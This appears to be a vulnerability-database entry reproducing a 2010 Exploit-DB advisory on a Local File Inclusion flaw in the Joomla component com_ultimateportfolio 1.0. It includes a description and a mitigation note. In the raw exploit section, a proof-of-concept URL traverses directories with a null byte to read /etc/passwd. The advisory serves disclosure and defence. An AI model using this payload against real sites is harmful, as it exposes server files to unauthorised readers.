Joomla Component Ultimate Portfolio Local File Inclusion Vulnerability

vendor:

com_ultimateportfolio

by:

AntiSecurity

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_ultimateportfolio

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:webkul:com_ultimateportfolio:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Ultimate Portfolio Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the com_ultimateportfolio version 1.0 component for Joomla. An attacker can exploit this vulnerability to include arbitrary files from the web server, which can lead to the disclosure of sensitive information. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing directory traversal characters (e.g. '../') to the vulnerable script. Successful exploitation of this vulnerability can result in the disclosure of sensitive information, such as the web server's configuration files, which can lead to further attacks.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered before being used in file operations.

Source

Exploit-DB raw data:

=======================================================================================================================


  [o] Joomla Component Ultimate Portfolio Local File Inclusion Vulnerability
 
       Software : com_ultimateportfolio version 1.0
       Vendor   : http://webkul.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=======================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_ultimateportfolio&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00


=======================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


=======================================================================================================================


  [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia